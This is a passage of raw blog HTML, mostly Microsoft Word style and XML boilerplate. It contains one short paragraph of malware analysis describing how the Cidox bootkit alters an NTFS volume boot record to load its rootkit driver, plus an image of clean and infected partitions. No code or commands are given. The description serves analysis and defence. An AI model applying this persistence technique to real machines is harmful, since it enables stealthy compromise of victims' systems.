<w:LsdException Locked="false" Priority="39" Name="toc 6"/>
<w:LsdException Locked="false" Priority="39" Name="toc 7"/>
<w:LsdException Locked="false" Priority="39" Name="toc 8"/>
<w:LsdException Locked="false" Priority="39" Name="toc 9"/>
<w:LsdException Locked="false" Priority="35" QFormat="true" Name="caption"/>
<w:LsdException Locked="false" Priority="10" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Title"/>
<w:LsdException Locked="false" Priority="1" Name="Default Paragraph Font"/>
<w:LsdException Locked="false" Priority="11" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Subtitle"/>
<w:LsdException Locked="false" Priority="22" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Strong"/>
<w:LsdException Locked="false" Priority="20" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Emphasis"/>
<w:LsdException Locked="false" Priority="59" SemiHidden="false"
UnhideWhenUsed="false" Name="Table Grid"/>
<w:LsdException Locked="false" UnhideWhenUsed="false" Name="Placeholder Text"/>
<w:LsdException Locked="false" Priority="1" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="No Spacing"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 1"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 1"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 1"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 1"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 1"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 1"/>
<w:LsdException Locked="false" UnhideWhenUsed="false" Name="Revision"/>
<w:LsdException Locked="false" Priority="34" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="List Paragraph"/>
<w:LsdException Locked="false" Priority="29" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Quote"/>
<w:LsdException Locked="false" Priority="30" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Intense Quote"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 1"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 1"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 1"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 1"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 1"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 1"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 1"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 1"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 2"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 2"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 2"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 2"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 2"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 2"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 2"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 2"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 2"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 2"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 2"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 2"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 2"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 2"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 3"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 3"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 3"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 3"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 3"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 3"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 3"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 3"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 3"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 3"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 3"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 3"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 3"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 3"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 4"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 4"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 4"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 4"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 4"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 4"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 4"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 4"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 4"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 4"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 4"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 4"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 4"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 4"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 5"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 5"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 5"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 5"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 5"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 5"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 5"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 5"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 5"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 5"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 5"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 5"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 5"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 5"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 6"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 6"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 6"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 6"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 6"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 6"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 6"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 6"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 6"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 6"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 6"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 6"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 6"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 6"/>
<w:LsdException Locked="false" Priority="19" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Subtle Emphasis"/>
<w:LsdException Locked="false" Priority="21" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Intense Emphasis"/>
<w:LsdException Locked="false" Priority="31" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Subtle Reference"/>
<w:LsdException Locked="false" Priority="32" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Intense Reference"/>
<w:LsdException Locked="false" Priority="33" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Book Title"/>
<w:LsdException Locked="false" Priority="37" Name="Bibliography"/>
<w:LsdException Locked="false" Priority="39" QFormat="true" Name="TOC Heading"/>
</w:LatentStyles>
</xml><![endif]--><!--[if gte mso 10]>
<style>
/* Style Definitions */
table.MsoNormalTable
{mso-style-name:"Table Normal";
mso-tstyle-rowband-size:0;
mso-tstyle-colband-size:0;
mso-style-noshow:yes;
mso-style-priority:99;
mso-style-parent:"";
mso-padding-alt:0in 5.4pt 0in 5.4pt;
mso-para-margin-top:0in;
mso-para-margin-right:0in;
mso-para-margin-bottom:10.0pt;
mso-para-margin-left:0in;
line-height:115%;
mso-pagination:widow-orphan;
font-size:11.0pt;
font-family:"Calibri","sans-serif";
mso-ascii-font-family:Calibri;
mso-ascii-theme-font:minor-latin;
mso-hansi-font-family:Calibri;
mso-hansi-theme-font:minor-latin;}
</style>
<![endif]-->
</span></span><br />
<div class="MsoNormal" style="line-height: normal; mso-margin-bottom-alt: auto; mso-margin-top-alt: auto; text-align: justify;">
<span style="font-size: 12.0pt; mso-fareast-font-family: "Times New Roman";"><b style="mso-bidi-font-weight: normal;"><span style="font-family: "Times New Roman","serif"; font-size: 12.0pt; mso-fareast-font-family: "Times New Roman";">BOOT LOADER</span></b><span style="font-family: "Times New Roman","serif"; font-size: 12.0pt; mso-fareast-font-family: "Times New Roman";"></span></span></div>
<br />
<span style="font-family: Times,"Times New Roman",serif;"><span style="font-size: 12.0pt; mso-fareast-font-family: "Times New Roman";">Cidox modifies the sector containing the active volume boot record of an NTFS partition in order to properly load its root kit. Once the malicious boot code is executed, it reads the malicious rootkit driver file in the disk, transfers execution to it and resumes normal boot operation.</span></span><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj1cIEVax-vqyknDWKyHflS3bSrN11scIZ7XqH4RbME7sIb5cYH9Nhrpq2AFUDAc0dvRKa-E_BRbb6kLZyt-5svimrz85J3dTXwABEhe64oiE1ccLbPmn5un7gASZKC4byygVE_6UR3dFY/s1600/mbrinfected.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="195" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj1cIEVax-vqyknDWKyHflS3bSrN11scIZ7XqH4RbME7sIb5cYH9Nhrpq2AFUDAc0dvRKa-E_BRbb6kLZyt-5svimrz85J3dTXwABEhe64oiE1ccLbPmn5un7gASZKC4byygVE_6UR3dFY/s400/mbrinfected.jpg" width="400" /></a></div>
<br />
<div style="text-align: center;">
<span style="font-family: Times,"Times New Roman",serif;"><span style="font-size: 12.0pt; mso-fareast-font-family: "Times New Roman";"><i>Clean and infected copy of w32 infected partition</i></span></span></div>
</div>
<div class="MsoNormal" style="line-height: normal; mso-margin-bottom-alt: auto; mso-margin-top-alt: auto; text-align: justify;">
<span style="font-family: Times,"Times New Roman",serif;"><br /></span>
<span style="font-family: Times,"Times New Roman",serif;"><br /></span>
<br />
<!--[if gte mso 9]><xml>
<o:OfficeDocumentSettings>
<o:RelyOnVML/>
<o:AllowPNG/>
</o:OfficeDocumentSettings>
</xml><![endif]-->
<!--[if gte mso 9]><xml>
<w:WordDocument>
<w:View>Normal</w:View>
<w:Zoom>0</w:Zoom>
<w:TrackMoves/>
<w:TrackFormatting/>
<w:PunctuationKerning/>
<w:ValidateAgainstSchemas/>
<w:SaveIfXMLInvalid>false</w:SaveIfXMLInvalid>
<w:IgnoreMixedContent>false</w:IgnoreMixedContent>
<w:AlwaysShowPlaceholderText>false</w:AlwaysShowPlaceholderText>
<w:DoNotPromoteQF/>
<w:LidThemeOther>EN-US</w:LidThemeOther>
<w:LidThemeAsian>X-NONE</w:LidThemeAsian>
<w:LidThemeComplexScript>X-NONE</w:LidThemeComplexScript>
<w:Compatibility>
<w:BreakWrappedTables/>
<w:SnapToGridInCell/>
<w:WrapTextWithPunct/>
<w:UseAsianBreakRules/>
<w:DontGrowAutofit/>
<w:SplitPgBreakAndParaMark/>
<w:EnableOpenTypeKerning/>
<w:DontFlipMirrorIndents/>
<w:OverrideTableStyleHps/>
</w:Compatibility>
<m:mathPr>
<m:mathFont m:val="Cambria Math"/>
<m:brkBin m:val="before"/>
<m:brkBinSub m:val="--"/>
<m:smallFrac m:val="off"/>
<m:dispDef/>
<m:lMargin m:val="0"/>
<m:rMargin m:val="0"/>
<m:defJc m:val="centerGroup"/>
<m:wrapIndent m:val="1440"/>
<m:intLim m:val="subSup"/>
<m:naryLim m:val="undOvr"/>
</m:mathPr></w:WordDocument>
</xml><![endif]--><!--[if gte mso 9]><xml>
<w:LatentStyles DefLockedState="false" DefUnhideWhenUsed="true"
DefSemiHidden="true" DefQFormat="false" DefPriority="99"
LatentStyleCount="267">
<w:LsdException Locked="false" Priority="0" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Normal"/>
<w:LsdException Locked="false" Priority="9" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="heading 1"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 2"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 3"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 4"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 5"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 6"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 7"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 8"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 9"/>
<w:LsdException Locked="false" Priority="39" Name="toc 1"/>
<w:LsdException Locked="false" Priority="39" Name="toc 2"/>
<w:LsdException Locked="false" Priority="39" Name="toc 3"/>
<w:LsdException Locked="false" Priority="39" Name="toc 4"/>
<w:LsdException Locked="false" Priority="39" Name="toc 5"/>
<w:LsdException Locked="false" Priority="39" Name="toc 6"/>
<w:LsdException Locked="false" Priority="39" Name="toc 7"/>
<w:LsdException Locked="false" Priority="39" Name="toc 8"/>
<w:LsdException Locked="false" Priority="39" Name="toc 9"/>
<w:LsdException Locked="false" Priority="35" QFormat="true" Name="caption"/>
<w:LsdException Locked="false" Priority="10" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Title"/>
<w:LsdException Locked="false" Priority="1" Name="Default Paragraph Font"/>
<w:LsdException Locked="false" Priority="11" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Subtitle"/>
<w:LsdException Locked="false" Priority="22" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Strong"/>
<w:LsdException Locked="false" Priority="20" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Emphasis"/>
<w:LsdException Locked="false" Priority="59" SemiHidden="false"
UnhideWhenUsed="false" Name="Table Grid"/>
<w:LsdException Locked="false" UnhideWhenUsed="false" Name="Placeholder Text"/>
<w:LsdException Locked="false" Priority="1" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="No Spacing"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 1"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 1"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 1"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 1"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 1"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 1"/>
<w:LsdException Locked="false" UnhideWhenUsed="false" Name="Revision"/>
<w:LsdException Locked="false" Priority="34" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="List Paragraph"/>
<w:LsdException Locked="false" Priority="29" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Quote"/>
<w:LsdException Locked="false" Priority="30" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Intense Quote"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 1"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 1"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 1"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 1"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 1"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 1"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 1"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 1"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 2"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 2"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 2"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 2"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 2"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 2"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 2"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 2"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 2"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 2"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 2"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 2"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 2"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 2"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 3"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 3"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 3"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 3"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 3"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 3"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 3"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 3"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 3"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 3"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 3"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 3"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 3"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 3"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 4"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 4"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 4"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 4"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 4"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 4"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 4"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 4"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 4"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 4"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 4"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 4"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 4"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 4"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
